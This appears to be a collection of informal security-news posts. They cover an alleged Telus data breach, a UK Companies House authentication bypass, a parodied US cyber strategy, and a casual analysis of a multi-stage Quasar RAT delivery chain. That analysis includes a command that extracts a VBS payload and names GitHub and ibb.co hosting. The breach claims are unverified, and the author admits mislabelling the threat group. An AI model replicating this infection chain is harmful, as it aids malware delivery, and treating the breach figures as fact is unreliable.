Today BleepinComputer published a story on a company named Telus Digital being compromised by a Threat Group operating under the moniker "ShinyHunters', a reference to Pokemon.

GTIG (Google Threat Intelligence Group) has been tracking ShinyHunters under the label UNC6395.

UNC6395 has been targeting enterprise organizations since at least August, 2025 by exploiting compromised OAuth tokens to gain access to company SalesForce instances. Upon successful compromise, UNC6395 attempts vertical or horizontal movement by combing through the compromised SalesForce data.

At a currently unknown time, UNC6395 successfully compromised Telus' SalesForce instance which allowed them to pivot elsewhere within the organization.

The amount of data UNC6395 claims to have compromised is astronomical. They claim to have exfiltrated over ONE PETABYTE of data (compressed as .tar.xz). While Telus has confirmed the compromise, the exfiltration of ONE PETABYTE of data indicates the compromise may have occurred weeks, possibly months, ago. Telus as of this writing has not given additional details on the compromise (more on that later).

I am unable to confirm the validity of the data, primarily because I do have the means to reliably comb through a petabyte of data. However, "snippets" and "samples" have been shared. Based off data seen, the compromised appears authentic. Here is a high-level overview of what was allegedly compromised and successfully exfiltrated.
- Employee Full Legal Name
- Employee National ID Number and/or SSN
- Telus hashed passwords, API keys, OAuth tokens
- Call record details
- Call meta data
- Telecom customer PII (First Name, Last Name, Address)
- HR records
- Agent performance records
- SalesForce accounts, contacts, leads, and records
- Financial records (ACH routing numbers, etc)
- GitHub repository access to an additional 20 organizations adjacent to Telus (20,000 internal source code projects)
- Customer and Agent call records in .wav
- 14,139 customer database instances, all containing customer PII (unspecified)
- GLEAN TELUS background check files. UNC6395 has access to FBI, RCMP, and CISA background checks.
- GLEAN TELUS confidential reports on investigations
- GLEAN TELUS confidential reports on tax filings (?)
- ... just search "GLEAN" on Google

If what UNC6395 states is true, this breach impacts approx. 230M companies across the globe. Based on information seen publicly, ... it looks bad.

However, as of this writing, Telus has not done anything other than confirm the compromise with some journalists. I suspect they're currently performing a DFIR (Digital Forensics and Incident Response) and forming a strategy to combat this technologically, legally, logistically, and PR-wise.

Is UNC6395 telling the truth? Is this compromise as severe as it appears to be? When will TELUS provide more details? Will impacted customers be notified? Is law enforcement mad their background checks are allegedly compromised?

Find out next time on Dragon Ball Z

I have been informed I misread and used the wrong UNC number. Now people are calling me a doofus and a dumb cat (I'm not a fucking cat wtf)

In other news, someone published a paper today about how they were able to abuse Perplexity AI to get unlimited Claude tokens.

It turns out the researcher misunderstood Perplexity billing methods and he will be billed accordingly.

> be uk government
> make web portal for doing taxes
> companieshouse
> click file for different company
> enter company number
> prompt for auth
> hit back button 3 times
> authentication bypassed
> ???
> full information leaked
> can modify company details for uk gov
> ???

Today United States Donald J. Trump released the "Cyber Strategy for America" document. It was highlighted by FBI Director Kash Patel.

Let's take a look at it together. I'll translate it from fancy political speak into nerd speak.

Intro:
>america is cool and badass
>were strong af fr
>our hackers are schizo af
>we could be strongerer
>need corpos to work with us fr
>were fuckin shit up so nerds cant hide
>america 250 years old soon
>computers are important

Section Two:
>we made the internet
>we are the best in internet stuff
>mean nerds fuck shit up on the internet
>mean nerds pissing us off
>"im trump and im not a bitch about cyber"
>mean nerds targeting important shit online
>this is a new era of cyberspace
>lots of money online

Section Three:
>mean nerds pissing us off fr
>if we cant internet you, well physically hurt you
>he actually wrote that LOL
>other countries have shitty AI
>we have the best AI
>were gonna work with unis and companies for AI
>wont let people be censored online
>something about people censoring americans
>mean nerds will get sanctioned
>mean nerds will be memed
>mean nerds will get beat up (maybe)
>america remove more regulations on AI
>regulations slow us down
>gotta go fast af boi fr
>cybersecurity so important fr

Donald J. Trump Pillars of Action:
1. Shape Adversary Behavior
>mean nerds attacking americans and companies
>theyre innocent ppl tho
>nsa and cia given thumbs up to hack back extra
>we raising aggression

2. Promote Common Sense Regulation
>reduce cybersecurity regulation
>checklists are for losers
>regulation make companies less agile
>companies and gov need to be fast af

3. Modernize and Secure Federal Government Networks
>government computers are lame
>will make them better
>use best practices
>use "post-quantum cryptography"
>use "zero-trust architecture"
>use "cloud transition"
>will improve stuff to hunt down nerds we dont like
>will use AI for cybersecurity

4. Secure Critical Infrastructure
>critical infra support important
>energy grid important af to defend
>banks important af to defend
>hospitals important af to defend
>water plants important af to defend
>telecoms important af to defend
>datacenters important af to defend
>must defend everything important af
>stop using technology made by countries we dont like

5. Sustain Superiority in Critical and Emerging Technologies
>america will make more tech stuff
>we gonna protect what we make fr
>cryptocurrency must be secured and stuff
>we need quantum stuff
>ai mega important tho
>we need more ai for hacking and for defense
>people we dont like hack dumb and shitty ai

6. Build Talent and Capacity
>we need more nerds
>nerds are unironically super important
>need to invest in nerds
>remove "roadblocks" for nerds (???) across industry
>will invest in more nerd stuff for nerds to learn

Today the Israel government dropped flyers over the people of Lebanon.

The Lebanese government warned citizens to not scan the QR codes because they were concerned it could be a way for the Israel government to compromise peoples phones.

I said, "WHAT THE FUCK. FREE MALWARE?" I IMMEDIATELY scanned it. I didn't even hesitate.

All it did was link me to some goofy WhatsApp thingy (I don't have WhatsApp) and it linked me to something called Unit504 on Facebook.

To be fair, it is 100% possible for the Israel government to have a WhatsApp exploit. I tested it from my computer and was disappointed.

> wake up
> take a shit
> get out of bed
> get on beep boop machine
> check the everything app
> more notifications than atoms in universe
> look inside

Big shout out to my baby boy. He'll be one years old any day now.

He has unlocked a new skill.

It's opening the refrigerator and pulling things off the bottom shelf and throwing them all over the kitchen floor

Thank you, unknown person on the internet, for e-mailing from a compromised Argentina military e-mail.

I'm sure the Argentina government loves having to perform an internal incident response to discover it has been used to send some random dude on the internet pictures of cats.

Whenever someone sends me an e-mail from a compromised government e-mail, and I acknowledge it, people get silly and begin sending me e-mails from other compromised government e-mails.

Thank you, random person, for the e-mail from a compromised Brazilian government e-mail.

Yes, I know these are from stealer logs (maybe. I don't know), but sometimes it makes me giggle.

Hello,

It is time again I sync updates to malware city, the website some of you visit, and some of you don't.

Upload notes will come soon.

In the meantime, enjoy this cool clip from the latest Nicki Minaj song

Her latest songs are a little angrier and less pop since she has leaned into being a conservative. Regardless, I think it fits her well. I think it's cool she experiments with different sounds and genres.

Hello,

I pushed the malware stuff to that malware website you sometimes visit.

It is Sunday so please spend it with the most important people in your life (your anime action figures)

https://vx-underground.org/Updates

> check tele
> "smelly i think someone sent me malware"
> "they sent me weird .zip"
> "be careful"
> wtf i love malware
> download file
> look inside
> .txt + alternate data stream file
> ads doesnt work with 7z
> ok lol
> look inside
> 7z x "dox[.]zip" -so > payload.vbs
> winhttp request to github
> github\minecraftstuff\discordemojis.txt
> download discordemojis.txt
> look inside
> heavily obfuscated .bat file
> bonk with stick
> powershell script
> ???
> checks for av stuff
> does steganography
> downloads from ibb.co
> look inside
> quasar rat
> hides in made fonts directory in roaming

most work ive seen put into a malware payload in awhile with 2 stages and stego, usually its FAKE_GAME_INSTALLER.JPEG.EXE

didnt even dawn on me this was CVE-2025-8088

- n-day
- multi-staged payload
- stego usage
- quasar???

wtf lol